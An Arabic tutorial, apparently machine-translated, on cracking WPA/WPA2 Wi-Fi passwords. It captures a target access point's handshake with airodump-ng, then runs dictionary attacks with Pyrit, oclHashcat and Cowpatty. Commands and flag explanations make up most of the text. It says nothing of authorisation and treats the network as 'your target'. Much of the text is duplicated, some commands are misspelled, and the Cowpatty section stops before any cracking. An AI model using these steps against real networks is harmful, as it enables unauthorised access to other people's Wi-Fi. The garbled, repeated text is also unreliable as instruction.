طرق للقضاء على Wifi باستخدام Pyrit و oclHashcat و Cowpatty
قم أولاً ببدء وضع الشاشة على محولنا اللاسلكي.
قم أولاً ببدء وضع الشاشة على محولنا اللاسلكي.
الآن يتم تمكين وضع الشاشة مع اسم wlan0mon.
ثم مع الأمر التالي ، ابدأ في الاستماع إلى جميع اتصالات wifi المتاحة:
airodump-ng wlan0mon
ثم مع الأمر التالي ، ابدأ في الاستماع إلى جميع اتصالات wifi المتاحة:
airodump-ng wlan0mon
بعد تشغيل الأمر أعلاه ، سيبدأ الاستماع لكل حركة مرور wifi القريبة ، لذا انتظر حتى يظهر هدفك ، ثم اضغط على ctrl ^ c.
الآن علينا أن نستمع إلى قناة محددة يوجد عليها الهدف. الآن قم بتشغيل الأمر:
irodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == رقم قناة الهدف (2 في حالتي ، راجع العمود CH)
–bssid == عنوان MAC للهدف AP
- write == اسم ملف الالتقاط
الآن علينا أن نستمع إلى قناة محددة يوجد عليها الهدف. الآن قم بتشغيل الأمر:
irodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon
-c == رقم قناة الهدف (2 في حالتي ، راجع العمود CH)
–bssid == عنوان MAC للهدف AP
- write == اسم ملف الالتقاط
انتظر الآن حتى يتم التقاط مصافحة WPA ثم اضغط على crtl ^ c.
سيتم الآن إنشاء ملف باسم sommay-01.cap
سيتم الآن إنشاء ملف باسم sommay-01.cap
PYRIT
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس
-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)
attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه
كما ترون فقد نجحت في كسر كلمة المرور.
OCLHASHCAT
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap
بادئ ذي بدء ، قم بتنزيل oclhashcat
من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z
أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:
aircrack-ng sommay-01.cap -J sommay-01
-J ==
المسار إلى ملف الإخراج مع التمديد .hccap
الآن قم بنسخ القاموس الذي تريد استخدامه في مجلد Hashcat. أدخل الآن في المجلد hashcat وتشغيل الأمر:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
في الأمر أعلاه ، إذا كنت تستخدم نظام 32 بت ، فاستبدل 64 بـ 32.
-m هو نوع التجزئة وهو 2500 لتكسير WPA / WPA2
ثم قم بإعطاء المسار إلى ملف hccap الذي قمت بتحويله باستخدام aircrack-ng. ثم اسم ملف القاموس. كما ترون فقد نجحت في كسر كلمة المرور.
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
في الأمر أعلاه ، إذا كنت تستخدم نظام 32 بت ، فاستبدل 64 بـ 32.
-m هو نوع التجزئة وهو 2500 لتكسير WPA / WPA2
ثم قم بإعطاء المسار إلى ملف hccap الذي قمت بتحويله باستخدام aircrack-ng. ثم اسم ملف القاموس. كما ترون فقد نجحت في كسر كلمة المرور.
COWPATTY
للتشققات بمساعدة cowpatty ، علينا أولاً إنشاء ملف التجزئة الخاص بـ AP المستهدف. لهذا سوف نستخدم genpmk لذلك قم بتشغيل الأمر:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f ==
المسار إلى ملف القاموس
-d ==
اسم قاموس الإخراج
-s ==
ESSID (اسم) الهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
الآن سيتم إنشاء ملف قاموس باسم cowpatty_dict مما سيسرع في عملية التكسير.
للتشققات بمساعدة cowpatty ، علينا أولاً إنشاء ملف التجزئة الخاص بـ AP المستهدف. لهذا سوف نستخدم genpmk لذلك قم بتشغيل الأمر:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f ==
المسار إلى ملف القاموس
-d ==
اسم قاموس الإخراج
-s ==
ESSID (اسم) الهدف AP (يجب أن يكون الاسم مطابقًا للهدف AP)
الآن سيتم إنشاء ملف قاموس باسم cowpatty_dict مما سيسرع في عملية التكسير.